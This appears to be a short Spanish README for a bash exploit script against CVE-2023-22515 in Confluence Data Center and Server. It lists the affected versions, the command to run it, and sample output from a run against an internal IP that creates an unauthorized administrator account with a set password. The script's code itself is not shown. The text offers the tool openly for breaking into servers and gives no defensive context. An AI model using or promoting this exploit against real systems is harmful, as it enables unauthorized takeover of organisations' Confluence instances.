
Script Bash que explota CVE-2023-22515 en Confluence Data Center y Server para crear cuentas de administrador no autorizadas, permitiendo acceso no autorizado.
Un exploit de script bash simple para CVE-2023-22515.
Las instancias de Confluence Data Center y Server tienen una vulnerabilidad de control de acceso roto (CVE-2023-22515), que permite a los atacantes crear cuentas de administrador de Confluence no autorizadas y acceder a las instancias de Confluence.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Comprobando si el host es vulnerable...
Vulnerable --> Código de respuesta: 200
[+] Explotando el objetivo...
[+] ¡Exploit completado!!!
[INFO] Usuario creado: a123456
[INFO] Contraseña creada: ChangeMe123